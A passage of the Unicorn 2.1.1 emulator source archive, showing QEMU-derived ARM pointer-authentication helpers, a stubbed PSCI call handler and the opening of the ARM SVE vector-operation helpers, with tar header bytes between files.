&env->keys.apia, false); } uint64_t HELPER(pacib)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnIB)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, &env->keys.apib, false); } uint64_t HELPER(pacda)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnDA)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, &env->keys.apda, true); } uint64_t HELPER(pacdb)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnDB)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_addpac(env, x, y, &env->keys.apdb, true); } uint64_t HELPER(pacga)(CPUARMState *env, uint64_t x, uint64_t y) { uint64_t pac; pauth_check_trap(env, arm_current_el(env), GETPC()); pac = pauth_computepac(x, y, env->keys.apga); return pac & 0xffffffff00000000ull; } uint64_t HELPER(autia)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnIA)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_auth(env, x, y, &env->keys.apia, false, 0); } uint64_t HELPER(autib)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnIB)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_auth(env, x, y, &env->keys.apib, false, 1); } uint64_t HELPER(autda)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnDA)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_auth(env, x, y, &env->keys.apda, true, 0); } uint64_t HELPER(autdb)(CPUARMState *env, uint64_t x, uint64_t y) { int el = arm_current_el(env); if (!pauth_key_enabled(env, el, SCTLR_EnDB)) { return x; } pauth_check_trap(env, el, GETPC()); return pauth_auth(env, x, y, &env->keys.apdb, true, 1); } uint64_t HELPER(xpaci)(CPUARMState *env, uint64_t a) { return pauth_strip(env, a, false); } uint64_t HELPER(xpacd)(CPUARMState *env, uint64_t a) { return pauth_strip(env, a, true); } �������������������������������������������������������unicorn-2.1.1/qemu/target/arm/psci.c����������������������������������������������������������������0000664�0000000�0000000�00000003204�14675241067�0017321�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (C) 2014 - Linaro * Author: Rob Herring <rob.herring@linaro.org> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "internals.h" bool arm_is_psci_call(ARMCPU *cpu, int excp_type) { /* Return true if the r0/x0 value indicates a PSCI call and * the exception type matches the configured PSCI conduit. This is * called before the SMC/HVC instruction is executed, to decide whether * we should treat it as a PSCI call or with the architecturally * defined behaviour for an SMC or HVC (which might be UNDEF or trap * to EL2 or to EL3). */ switch (excp_type) { case EXCP_HVC: if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_HVC) { return false; } break; case EXCP_SMC: if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) { return false; } break; default: return false; } return false; } void arm_handle_psci_call(ARMCPU *cpu) { } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/sve_helper.c����������������������������������������������������������0000664�0000000�0000000�00000573110�14675241067�0020527�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM SVE Operations * * Copyright (c) 2018 Linaro, Ltd. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "tcg/tcg-gvec-desc.h" #include "fpu/softfloat.h" #include "tcg/tcg.h" /* Note that vector data is stored in host-endian 64-bit chunks, so addressing units smaller than that needs a host-endian fixup. */ #ifdef HOST_WORDS_BIGENDIAN #define H1(x) ((x) ^ 7) #define H1_2(x) ((x) ^ 6) #define H1_4(x) ((x) ^ 4) #define H2(x) ((x) ^ 3) #define H4(x) ((x) ^ 1) #else #define H1(x) (x) #define H1_2(x) (x) #define H1_4(x) (x) #define H2(x) (x) #define H4(x) (x) #endif /* Return a value for NZCV as per the ARM PredTest pseudofunction. * * The return value has bit 31 set if N is set, bit 1 set if Z is clear, * and bit 0 set if C is set. Compare the definitions of these variables * within CPUARMState. */ /* For no G bits set, NZCV = C. */ #define PREDTEST_INIT 1 /* This is an iterative function, called for each Pd and Pg word * moving forward. */ static uint32_t iter_predtest_fwd(uint64_t d, uint64_t g, uint32_t flags) { if (likely(g)) { /* Compute N from first D & G. Use bit 2 to signal first G bit seen. */ if (!(flags & 4)) { #ifdef _MSC_VER flags |= ((d & (g & (0 - g))) != 0) << 31; #else flags |= ((d & (g & -g)) != 0) << 31; #endif flags |= 4; } /* Accumulate Z from each D & G. */ flags |= ((d & g) != 0) << 1; /* Compute C from last !(D & G). Replace previous. */ flags = deposit32(flags, 0, 1, (d & pow2floor(g)) == 0); } return flags; } /* This is an iterative function, called for each Pd and Pg word * moving backward. */ static uint32_t iter_predtest_bwd(uint64_t d, uint64_t g, uint32_t flags) { if (likely(g)) { /* Compute C from first (i.e last) !(D & G). Use bit 2 to signal first G bit seen. */ if (!(flags & 4)) { flags += 4 - 1; /* add bit 2, subtract C from PREDTEST_INIT */ flags |= (d & pow2floor(g)) == 0; } /* Accumulate Z from each D & G. */ flags |= ((d & g) != 0) << 1; /* Compute N from last (i.e first) D & G. Replace previous. */ #ifdef _MSC_VER flags = deposit32(flags, 31, 1, (d & (g & (0 - g))) != 0); #else flags = deposit32(flags, 31, 1, (d & (g & -g)) != 0); #endif } return flags; } /* The same for a single word predicate. */ uint32_t HELPER(sve_predtest1)(uint64_t d, uint64_t g) { return iter_predtest_fwd(d, g, PREDTEST_INIT); } /* The same for a multi-word predicate. */ uint32_t HELPER(sve_predtest)(void *vd, void *vg, uint32_t words) { uint32_t flags = PREDTEST_INIT; uint64_t *d = vd, *g = vg; uintptr_t i = 0; do { flags = iter_predtest_fwd(d[i], g[i], flags); } while (++i < words); return flags; } /* Expand active predicate bits to bytes, for byte elements. * for (i = 0; i < 256; ++i) { * unsigned long m = 0; * for (j = 0; j < 8; j++) { * if ((i >> j) & 1) { * m |= 0xfful << (j << 3); * } * } * printf("0x%016lx,\n", m); * } */ static inline uint64_t expand_pred_b(uint8_t byte) { static const uint64_t word[256] = { 0x0000000000000000, 0x00000000000000ff, 0x000000000000ff00, 0x000000000000ffff, 0x0000000000ff0000, 0x0000000000ff00ff, 0x0000000000ffff00, 0x0000000000ffffff, 0x00000000ff000000, 0x00000000ff0000ff, 0x00000000ff00ff00, 0x00000000ff00ffff, 0x00000000ffff0000, 0x00000000ffff00ff, 0x00000000ffffff00, 0x00000000ffffffff, 0x000000ff00000000, 0x000000ff000000ff, 0x000000ff0000ff00, 0x000000ff0000ffff, 0x000000ff00ff0000, 0x000000ff00ff00ff, 0x000000ff00ffff00, 0x000000ff00ffffff, 0x000000ffff000000, 0x000000ffff0000ff, 0x000000ffff00ff00, 0x000000ffff00ffff, 0x000000ffffff0000, 0x000000ffffff00ff, 0x000000ffffffff00, 0x000000ffffffffff, 0x0000ff0000000000, 0x0000ff00000000ff, 0x0000ff000000ff00, 0x0000ff000000ffff, 0x0000ff0000ff0000, 0x0000ff0000ff00ff, 0x0000ff0000ffff00, 0x0000ff0000ffffff, 0x0000ff00ff000000, 0x0000ff00ff0000ff, 0x0000ff00ff00ff00, 0x0000ff00ff00ffff, 0x0000ff00ffff0000, 0x0000ff00ffff00ff, 0x0000ff00ffffff00, 0x0000ff00ffffffff, 0x0000ffff00000000, 0x0000ffff000000ff, 0x0000ffff0000ff00, 0x0000ffff0000ffff, 0x0000ffff00ff0000, 0x0000ffff00ff00ff, 0x0000ffff00ffff00, 0x0000ffff00ffffff, 0x0000ffffff000000, 0x0000ffffff0000ff, 0x0000ffffff00ff00, 0x0000ffffff00ffff, 0x0000ffffffff0000, 0x0000ffffffff00ff, 0x0000ffffffffff00, 0x0000ffffffffffff, 0x00ff000000000000, 0x00ff0000000000ff, 0x00ff00000000ff00, 0x00ff00000000ffff, 0x00ff000000ff0000, 0x00ff000000ff00ff, 0x00ff000000ffff00, 0x00ff000000ffffff, 0x00ff0000ff000000, 0x00ff0000ff0000ff, 0x00ff0000ff00ff00, 0x00ff0000ff00ffff, 0x00ff0000ffff0000, 0x00ff0000ffff00ff, 0x00ff0000ffffff00, 0x00ff0000ffffffff, 0x00ff00ff00000000, 0x00ff00ff000000ff, 0x00ff00ff0000ff00, 0x00ff00ff0000ffff, 0x00ff00ff00ff0000, 0x00ff00ff00ff00ff, 0x00ff00ff00ffff00, 0x00ff00ff00ffffff, 0x00ff00ffff000000, 0x00ff00ffff0000ff, 0x00ff00ffff00ff00, 0x00ff00ffff00ffff, 0x00ff00ffffff0000, 0x00ff00ffffff00ff, 0x00ff00ffffffff00, 0x00ff00ffffffffff, 0x00ffff0000000000, 0x00ffff00000000ff, 0x00ffff000000ff00, 0x00ffff000000ffff, 0x00ffff0000ff0000, 0x00ffff0000ff00ff, 0x00ffff0000ffff00, 0x00ffff0000ffffff, 0x00ffff00ff000000, 0x00ffff00ff0000ff, 0x00ffff00ff00ff00, 0x00ffff00ff00ffff, 0x00ffff00ffff0000, 0x00ffff00ffff00ff, 0x00ffff00ffffff00, 0x00ffff00ffffffff, 0x00ffffff00000000, 0x00ffffff000000ff, 0x00ffffff0000ff00, 0x00ffffff0000ffff, 0x00ffffff00ff0000, 0x00ffffff00ff00ff, 0x00ffffff00ffff00, 0x00ffffff00ffffff, 0x00ffffffff000000, 0x00ffffffff0000ff, 0x00ffffffff00ff00, 0x00ffffffff00ffff, 0x00ffffffffff0000, 0x00ffffffffff00ff, 0x00ffffffffffff00, 0x00ffffffffffffff, 0xff00000000000000, 0xff000000000000ff, 0xff0000000000ff00, 0xff0000000000ffff, 0xff00000000ff0000, 0xff00000000ff00ff, 0xff00000000ffff00, 0xff00000000ffffff, 0xff000000ff000000, 0xff000000ff0000ff, 0xff000000ff00ff00, 0xff000000ff00ffff, 0xff000000ffff0000, 0xff000000ffff00ff, 0xff000000ffffff00, 0xff000000ffffffff, 0xff0000ff00000000, 0xff0000ff000000ff, 0xff0000ff0000ff00, 0xff0000ff0000ffff, 0xff0000ff00ff0000, 0xff0000ff00ff00ff, 0xff0000ff00ffff00, 0xff0000ff00ffffff, 0xff0000ffff000000, 0xff0000ffff0000ff, 0xff0000ffff00ff00, 0xff0000ffff00ffff, 0xff0000ffffff0000, 0xff0000ffffff00ff, 0xff0000ffffffff00, 0xff0000ffffffffff, 0xff00ff0000000000, 0xff00ff00000000ff, 0xff00ff000000ff00, 0xff00ff000000ffff, 0xff00ff0000ff0000, 0xff00ff0000ff00ff, 0xff00ff0000ffff00, 0xff00ff0000ffffff, 0xff00ff00ff000000, 0xff00ff00ff0000ff, 0xff00ff00ff00ff00, 0xff00ff00ff00ffff, 0xff00ff00ffff0000, 0xff00ff00ffff00ff, 0xff00ff00ffffff00, 0xff00ff00ffffffff, 0xff00ffff00000000, 0xff00ffff000000ff, 0xff00ffff0000ff00, 0xff00ffff0000ffff, 0xff00ffff00ff0000, 0xff00ffff00ff00ff, 0xff00ffff00ffff00, 0xff00ffff00ffffff, 0xff00ffffff000000, 0xff00ffffff0000ff, 0xff00ffffff00ff00, 0xff00ffffff00ffff, 0xff00ffffffff0000, 0xff00ffffffff00ff, 0xff00ffffffffff00, 0xff00ffffffffffff, 0xffff000000000000, 0xffff0000000000ff, 0xffff00000000ff00, 0xffff00000000ffff, 0xffff000000ff0000, 0xffff000000ff00ff, 0xffff000000ffff00, 0xffff000000ffffff, 0xffff0000ff000000, 0xffff0000ff0000ff, 0xffff0000ff00ff00, 0xffff0000ff00ffff, 0xffff0000ffff0000, 0xffff0000ffff00ff, 0xffff0000ffffff00, 0xffff0000ffffffff, 0xffff00ff00000000, 0xffff00ff000000ff, 0xffff00ff0000ff00, 0xffff00ff0000ffff, 0xffff00ff00ff0000, 0xffff00ff00ff00ff, 0xffff00ff00ffff00, 0xffff00ff00ffffff, 0xffff00ffff000000, 0xffff00ffff0000ff, 0xffff00ffff00ff00, 0xffff00ffff00ffff, 0xffff00ffffff0000, 0xffff00ffffff00ff, 0xffff00ffffffff00, 0xffff00ffffffffff, 0xffffff0000000000, 0xffffff00000000ff, 0xffffff000000ff00, 0xffffff000000ffff, 0xffffff0000ff0000, 0xffffff0000ff00ff, 0xffffff0000ffff00, 0xffffff0000ffffff, 0xffffff00ff000000, 0xffffff00ff0000ff, 0xffffff00ff00ff00, 0xffffff00ff00ffff, 0xffffff00ffff0000, 0xffffff00ffff00ff, 0xffffff00ffffff00, 0xffffff00ffffffff, 0xffffffff00000000, 0xffffffff000000ff, 0xffffffff0000ff00, 0xffffffff0000ffff, 0xffffffff00ff0000, 0xffffffff00ff00ff, 0xffffffff00ffff00, 0xffffffff00ffffff, 0xffffffffff000000, 0xffffffffff0000ff, 0xffffffffff00ff00, 0xffffffffff00ffff, 0xffffffffffff0000, 0xffffffffffff00ff, 0xffffffffffffff00, 0xffffffffffffffff, }; return word[byte]; } /* Similarly for half-word elements. * for (i = 0; i < 256; ++i) { * unsigned long m = 0; * if (i & 0xaa) { * continue; * } * for (j = 0; j < 8; j += 2) { * if ((i >> j) & 1) { * m |= 0xfffful << (j << 3); * } * } * printf("[0x%x] = 0x%016lx,\n", i, m); * } */ static inline uint64_t expand_pred_h(uint8_t byte) { static const uint64_t word[] = { [0x01] = 0x000000000000ffff, [0x04] = 0x00000000ffff0000, [0x05] = 0x00000000ffffffff, [0x10] = 0x0000ffff00000000, [0x11] = 0x0000ffff0000ffff, [0x14] = 0x0000ffffffff0000, [0x15] = 0x0000ffffffffffff, [0x40] = 0xffff000000000000, [0x41] = 0xffff00000000ffff, [0x44] = 0xffff0000ffff0000, [0x45] = 0xffff0000ffffffff, [0x50] = 0xffffffff00000000, [0x51] = 0xffffffff0000ffff, [0x54] = 0xffffffffffff0000, [0x55] = 0xffffffffffffffff, }; return word[byte & 0x55]; } /* Similarly for single word elements. */ static inline uint64_t expand_pred_s(uint8_t byte) { static const uint64_t word[] = { [0x01] = 0x00000000ffffffffull, [0x10] = 0xffffffff00000000ull, [0x11] = 0xffffffffffffffffull, }; return word[byte & 0x11]; } /* Swap 16-bit words within a 32-bit word. */ static inline uint32_t hswap32(uint32_t h) { return rol32(h, 16); } /* Swap 16-bit words within a 64-bit word. */ static inline uint64_t hswap64(uint64_t h) { uint64_t m = 0x0000ffff0000ffffull; h = rol64(h, 32); return ((h & m) << 16) | ((h >> 16) & m); } /* Swap 32-bit words within a 64-bit word. */ static inline uint64_t wswap64(uint64_t h) { return rol64(h, 32); } #define LOGICAL_PPPP(NAME, FUNC) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ uintptr_t opr_sz = simd_oprsz(desc); \ uint64_t *d = vd, *n = vn, *m = vm, *g = vg; \ uintptr_t i; \ for (i = 0; i < opr_sz / 8; ++i) { \ d[i] = FUNC(n[i], m[i], g[i]); \ } \ } #define DO_AND(N, M, G) (((N) & (M)) & (G)) #define DO_BIC(N, M, G) (((N) & ~(M)) & (G)) #define DO_EOR(N, M, G) (((N) ^ (M)) & (G)) #define DO_ORR(N, M, G) (((N) | (M)) & (G)) #define DO_ORN(N, M, G) (((N) | ~(M)) & (G)) #define DO_NOR(N, M, G) (~((N) | (M)) & (G)) #define DO_NAND(N, M, G) (~((N) & (M)) & (G)) #define DO_SEL(N, M, G) (((N) & (G)) | ((M) & ~(G))) LOGICAL_PPPP(sve_and_pppp, DO_AND) LOGICAL_PPPP(sve_bic_pppp, DO_BIC) LOGICAL_PPPP(sve_eor_pppp, DO_EOR) LOGICAL_PPPP(sve_sel_pppp, DO_SEL) LOGICAL_PPPP(sve_orr_pppp, DO_ORR) LOGICAL_PPPP(sve_orn_pppp, DO_ORN) LOGICAL_PPPP(sve_nor_pppp, DO_NOR) LOGICAL_PPPP(sve_nand_pppp, DO_NAND) #undef DO_AND #undef DO_BIC #undef DO_EOR #undef DO_ORR #undef DO_ORN #undef DO_NOR #undef DO_NAND #undef DO_SEL #undef LOGICAL_PPPP /* Fully general three-operand expander, controlled by a predicate. * This is complicated by the host-endian storage of the register file. */ /* ??? I don't expect the compiler could ever vectorize this itself. * With some tables we can convert bit masks to byte masks, and with * extra care wrt byte/word ordering we could use gcc generic vectors * and do 16 bytes at a time. */ #define DO_ZPZZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. */ #define DO_ZPZZ_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *n = vn, *m = vm; \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE nn = n[i], mm = m[i]; \ d[i] = OP(nn, mm); \ } \ } \ } #define DO_AND(N, M) (N & M) #define DO_EOR(N, M) (N ^ M) #define DO_ORR(N, M) (N | M) #define DO_BIC(N, M) (N & ~M) #define DO_ADD(N, M) (N + M) #define DO_SUB(N, M) (N - M) #define DO_MAX(N, M) ((N) >= (M) ? (N) : (M)) #define DO_MIN(N, M) ((N) >= (M) ? (M) : (N)) #define DO_ABD(N, M) ((N) >= (M) ? (N) - (M) : (M) - (N)) #define DO_MUL(N, M) (N * M) /* * We must avoid the C undefined behaviour cases: division by * zero and signed division of INT_MIN by -1. Both of these * have architecturally defined required results for Arm. * We special case all signed divisions by -1 to avoid having * to deduce the minimum integer for the type involved. */ #define DO_SDIV(N, M) (unlikely(M == 0) ? 0 : unlikely(M == -1) ? -N : N / M) #define DO_UDIV(N, M) (unlikely(M == 0) ? 0 : N / M) DO_ZPZZ(sve_and_zpzz_b, uint8_t, H1, DO_AND) DO_ZPZZ(sve_and_zpzz_h, uint16_t, H1_2, DO_AND) DO_ZPZZ(sve_and_zpzz_s, uint32_t, H1_4, DO_AND) DO_ZPZZ_D(sve_and_zpzz_d, uint64_t, DO_AND) DO_ZPZZ(sve_orr_zpzz_b, uint8_t, H1, DO_ORR) DO_ZPZZ(sve_orr_zpzz_h, uint16_t, H1_2, DO_ORR) DO_ZPZZ(sve_orr_zpzz_s, uint32_t, H1_4, DO_ORR) DO_ZPZZ_D(sve_orr_zpzz_d, uint64_t, DO_ORR) DO_ZPZZ(sve_eor_zpzz_b, uint8_t, H1, DO_EOR) DO_ZPZZ(sve_eor_zpzz_h, uint16_t, H1_2, DO_EOR) DO_ZPZZ(sve_eor_zpzz_s, uint32_t, H1_4, DO_EOR) DO_ZPZZ_D(sve_eor_zpzz_d, uint64_t, DO_EOR) DO_ZPZZ(sve_bic_zpzz_b, uint8_t, H1, DO_BIC) DO_ZPZZ(sve_bic_zpzz_h, uint16_t, H1_2, DO_BIC) DO_ZPZZ(sve_bic_zpzz_s, uint32_t, H1_4, DO_BIC) DO_ZPZZ_D(sve_bic_zpzz_d, uint64_t, DO_BIC) DO_ZPZZ(sve_add_zpzz_b, uint8_t, H1, DO_ADD) DO_ZPZZ(sve_add_zpzz_h, uint16_t, H1_2, DO_ADD) DO_ZPZZ(sve_add_zpzz_s, uint32_t, H1_4, DO_ADD) DO_ZPZZ_D(sve_add_zpzz_d, uint64_t, DO_ADD) DO_ZPZZ(sve_sub_zpzz_b, uint8_t, H1, DO_SUB) DO_ZPZZ(sve_sub_zpzz_h, uint16_t, H1_2, DO_SUB) DO_ZPZZ(sve_sub_zpzz_s, uint32_t, H1_4, DO_SUB) DO_ZPZZ_D(sve_sub_zpzz_d, uint64_t, DO_SUB) DO_ZPZZ(sve_smax_zpzz_b, int8_t, H1, DO_MAX) DO_ZPZZ(sve_smax_zpzz_h, int16_t, H1_2, DO_MAX) DO_ZPZZ(sve_smax_zpzz_s, int32_t, H1_4, DO_MAX) DO_ZPZZ_D(sve_smax_zpzz_d, int64_t, DO_MAX) DO_ZPZZ(sve_umax_zpzz_b, uint8_t, H1, DO_MAX) DO_ZPZZ(sve_umax_zpzz_h, uint16_t, H1_2, DO_MAX) DO_ZPZZ(sve_umax_zpzz_s, uint32_t, H1_4, DO_MAX) DO_ZPZZ_D(sve_umax_zpzz_d, uint64_t, DO_MAX) DO_ZPZZ(sve_smin_zpzz_b, int8_t, H1, DO_MIN) DO_ZPZZ(sve_smin_zpzz_h, int16_t, H1_2, DO_MIN) DO_ZPZZ(sve_smin_zpzz_s, int32_t, H1_4, DO_MIN) DO_ZPZZ_D(sve_smin_zpzz_d, int64_t, DO_MIN) DO_ZPZZ(sve_umin_zpzz_b, uint8_t, H1, DO_MIN) DO_ZPZZ(sve_umin_zpzz_h, uint16_t, H1_2, DO_MIN) DO_ZPZZ(sve_umin_zpzz_s, uint32_t, H1_4, DO_MIN) DO_ZPZZ_D(sve_umin_zpzz_d, uint64_t, DO_MIN) DO_ZPZZ(sve_sabd_zpzz_b, int8_t, H1, DO_ABD) DO_ZPZZ(sve_sabd_zpzz_h, int16_t, H1_2, DO_ABD) DO_ZPZZ(sve_sabd_zpzz_s, int32_t, H1_4, DO_ABD) DO_ZPZZ_D(sve_sabd_zpzz_d, int64_t, DO_ABD) DO_ZPZZ(sve_uabd_zpzz_b, uint8_t, H1, DO_ABD) DO_ZPZZ(sve_uabd_zpzz_h, uint16_t, H1_2, DO_ABD) DO_ZPZZ(sve_uabd_zpzz_s, uint32_t, H1_4, DO_ABD) DO_ZPZZ_D(sve_uabd_zpzz_d, uint64_t, DO_ABD) /* Because the computation type is at least twice as large as required, these work for both signed and unsigned source types. */ static inline uint8_t do_mulh_b(int32_t n, int32_t m) { return (n * m) >> 8; } static inline uint16_t do_mulh_h(int32_t n, int32_t m) { return (n * m) >> 16; } static inline uint32_t do_mulh_s(int64_t n, int64_t m) { return (n * m) >> 32; } static inline uint64_t do_smulh_d(uint64_t n, uint64_t m) { uint64_t lo, hi; muls64(&lo, &hi, n, m); return hi; } static inline uint64_t do_umulh_d(uint64_t n, uint64_t m) { uint64_t lo, hi; mulu64(&lo, &hi, n, m); return hi; } DO_ZPZZ(sve_mul_zpzz_b, uint8_t, H1, DO_MUL) DO_ZPZZ(sve_mul_zpzz_h, uint16_t, H1_2, DO_MUL) DO_ZPZZ(sve_mul_zpzz_s, uint32_t, H1_4, DO_MUL) DO_ZPZZ_D(sve_mul_zpzz_d, uint64_t, DO_MUL) DO_ZPZZ(sve_smulh_zpzz_b, int8_t, H1, do_mulh_b) DO_ZPZZ(sve_smulh_zpzz_h, int16_t, H1_2, do_mulh_h) DO_ZPZZ(sve_smulh_zpzz_s, int32_t, H1_4, do_mulh_s) DO_ZPZZ_D(sve_smulh_zpzz_d, uint64_t, do_smulh_d) DO_ZPZZ(sve_umulh_zpzz_b, uint8_t, H1, do_mulh_b) DO_ZPZZ(sve_umulh_zpzz_h, uint16_t, H1_2, do_mulh_h) DO_ZPZZ(sve_umulh_zpzz_s, uint32_t, H1_4, do_mulh_s) DO_ZPZZ_D(sve_umulh_zpzz_d, uint64_t, do_umulh_d) DO_ZPZZ(sve_sdiv_zpzz_s, int32_t, H1_4, DO_SDIV) DO_ZPZZ_D(sve_sdiv_zpzz_d, int64_t, DO_SDIV) DO_ZPZZ(sve_udiv_zpzz_s, uint32_t, H1_4, DO_UDIV) DO_ZPZZ_D(sve_udiv_zpzz_d, uint64_t, DO_UDIV) /* Note that all bits of the shift are significant and not modulo the element size. */ #define DO_ASR(N, M) (N >> MIN(M, sizeof(N) * 8 - 1)) #define DO_LSR(N, M) (M < sizeof(N) * 8 ? N >> M : 0) #define DO_LSL(N, M) (M < sizeof(N) * 8 ? N << M : 0) DO_ZPZZ(sve_asr_zpzz_b, int8_t, H1, DO_ASR) DO_ZPZZ(sve_lsr_zpzz_b, uint8_t, H1_2, DO_LSR) DO_ZPZZ(sve_lsl_zpzz_b, uint8_t, H1_4, DO_LSL) DO_ZPZZ(sve_asr_zpzz_h, int16_t, H1, DO_ASR) DO_ZPZZ(sve_lsr_zpzz_h, uint16_t, H1_2, DO_LSR) DO_ZPZZ(sve_lsl_zpzz_h, uint16_t, H1_4, DO_LSL) DO_ZPZZ(sve_asr_zpzz_s, int32_t, H1, DO_ASR) DO_ZPZZ(sve_lsr_zpzz_s, uint32_t, H1_2, DO_LSR) DO_ZPZZ(sve_lsl_zpzz_s, uint32_t, H1_4, DO_LSL) DO_ZPZZ_D(sve_asr_zpzz_d, int64_t, DO_ASR) DO_ZPZZ_D(sve_lsr_zpzz_d, uint64_t, DO_LSR) DO_ZPZZ_D(sve_lsl_zpzz_d, uint64_t, DO_LSL) #undef DO_ZPZZ #undef DO_ZPZZ_D /* Three-operand expander, controlled by a predicate, in which the * third operand is "wide". That is, for D = N op M, the same 64-bit * value of M is used with all of the narrower values of N. */ #define DO_ZPZW(NAME, TYPE, TYPEW, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint8_t pg = *(uint8_t *)((char *)vg + H1(i >> 3)); \ TYPEW mm = *(TYPEW *)((char *)vm + i); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 7); \ } \ } DO_ZPZW(sve_asr_zpzw_b, int8_t, uint64_t, H1, DO_ASR) DO_ZPZW(sve_lsr_zpzw_b, uint8_t, uint64_t, H1, DO_LSR) DO_ZPZW(sve_lsl_zpzw_b, uint8_t, uint64_t, H1, DO_LSL) DO_ZPZW(sve_asr_zpzw_h, int16_t, uint64_t, H1_2, DO_ASR) DO_ZPZW(sve_lsr_zpzw_h, uint16_t, uint64_t, H1_2, DO_LSR) DO_ZPZW(sve_lsl_zpzw_h, uint16_t, uint64_t, H1_2, DO_LSL) DO_ZPZW(sve_asr_zpzw_s, int32_t, uint64_t, H1_4, DO_ASR) DO_ZPZW(sve_lsr_zpzw_s, uint32_t, uint64_t, H1_4, DO_LSR) DO_ZPZW(sve_lsl_zpzw_s, uint32_t, uint64_t, H1_4, DO_LSL) #undef DO_ZPZW /* Fully general two-operand expander, controlled by a predicate. */ #define DO_ZPZ(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc); \ for (i = 0; i < opr_sz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ if (pg & 1) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn); \ } \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ } /* Similarly, specialized for 64-bit operands. */ #define DO_ZPZ_D(NAME, TYPE, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t i, opr_sz = simd_oprsz(desc) / 8; \ TYPE *d = vd, *n = vn; \ uint8_t *pg = vg; \ for (i = 0; i < opr_sz; i += 1) { \ if (pg[H1(i)] & 1) { \ TYPE nn = n[i]; \ d[i] = OP(nn); \ } \ } \ } #define DO_CLS_B(N) (clrsb32(N) - 24) #define DO_CLS_H(N) (clrsb32(N) - 16) DO_ZPZ(sve_cls_b, int8_t, H1, DO_CLS_B) DO_ZPZ(sve_cls_h, int16_t, H1_2, DO_CLS_H) DO_ZPZ(sve_cls_s, int32_t, H1_4, clrsb32) DO_ZPZ_D(sve_cls_d, int64_t, clrsb64) #define DO_CLZ_B(N) (clz32(N) - 24) #define DO_CLZ_H(N) (clz32(N) - 16) DO_ZPZ(sve_clz_b, uint8_t, H1, DO_CLZ_B) DO_ZPZ(sve_clz_h, uint16_t, H1_2, DO_CLZ_H) DO_ZPZ(sve_clz_s, uint32_t, H1_4, 